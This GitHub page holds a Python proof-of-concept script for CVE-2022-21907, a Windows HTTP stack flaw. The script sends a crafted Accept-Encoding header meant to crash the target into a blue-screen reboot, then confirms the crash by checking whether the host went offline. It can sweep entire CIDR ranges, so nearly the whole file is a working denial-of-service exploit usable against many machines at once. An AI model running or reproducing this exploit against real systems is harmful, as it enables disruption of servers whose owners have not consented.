-
Notifications
You must be signed in to change notification settings - Fork 11
/
CVE-2022-21907.py
96 lines (85 loc) · 4.27 KB
/
CVE-2022-21907.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
# Create by antx at 2022-01-17.
# integrated by Michele "[email protected]" just for fun, on 23.01.2022
import requests
from loguru import logger
import time
import argparse
from ipaddress import ip_network
header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36'}
class CVE_2022_21907():
@logger.catch(level='ERROR')
def first_handshake(self, target: str):
try:
resp = requests.get(target, headers=header, timeout=10)
if resp.status_code == 200:
logger.info(f'The first handshake: the target host is normal and can be verified by POC')
return True
logger.info(f'First handshake: the target host is normal, but returns an exception, status code: {resp.status_code}')
return False
except Exception as e:
logger.info(f'First handshake error: The target host is abnormal, please check whether the target host is alive, error resp: {e}')
return False
@logger.catch(level='ERROR')
def verify_handshake(self, target: str):
try:
resp = requests.get(target, headers=header, timeout=10)
if resp.status_code == 200:
logger.info(f'Verification result: The target host has restarted and returned to normal')
return False
logger.info(f'Verification result: The target host has restarted and returned to normal, but returned an exception with a status code: {resp.status_code}')
return False
except requests.exceptions.ConnectionError as e:
logger.info(f'Verification result: The verification is successful, the target host is abnormal, has been exploited and entered the blue screen restart')
return True
@logger.catch(level='ERROR')
def poc(self, target: str):
# headers = {'Accept-Encoding': 'doar-e, ftw, imo, ,'} # CVE-2021-31166
headers = {
'Accept-Encoding': 'AAAAAAAAAAAAAAAAAAAAAAAA, '
'BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S, '
'RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF, '
'TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP, '
'OOOAOAOOOAOOAOOOAOOOAOOOAOO, '
'****************************stupiD, *, ,'
} # CVE-2022-21907
try:
r = requests.get(target, headers=headers, timeout=10)
logger.info(f'POC handshake failed: {target} does not exist CVE-2022-21907 Vulnerability, may have been patched')
return False
except requests.exceptions.ReadTimeout as e:
logger.info(f'POC handshake success: {target} maybe can Exploit!')
return True
@logger.catch(level='ERROR')
def dia(self, url: str):
if 'http' not in url:
target = f'http://{url}'
elif 'https' in url:
target = url.replace('https', 'http')
else:
target = url
logger.info(f'start verification: {target}')
if not self.first_handshake(target):
logger.info(f'{target} does not exist CVE-2022-21907 Vulnerability')
return
self.poc(target)
logger.info(f'Deterministic verification again')
while True:
time.sleep(10)
if not self.verify_handshake(target):
break
logger.info(f'{target} have CVE-2022-21907 vulnerability, can be exploited!')
if __name__ == '__main__':
# Parse arguments
parser = argparse.ArgumentParser(description='CVE-2022-21907 PoC')
parser.add_argument('-i','--ip', help='IPs (CIDR) to attack',required=False)
parser.add_argument('-u','--url', help='URL to attack',required=False)
args = parser.parse_args()
if not args.ip and not args.url:
print("Please use -i or -u to specify target(s)!")
# default debug level: just errors!
cve = CVE_2022_21907()
if args.ip:
for ip in ip_network(args.ip).hosts():
cve.dia(format(ip))
elif args.url:
cve.dia(format(args.url))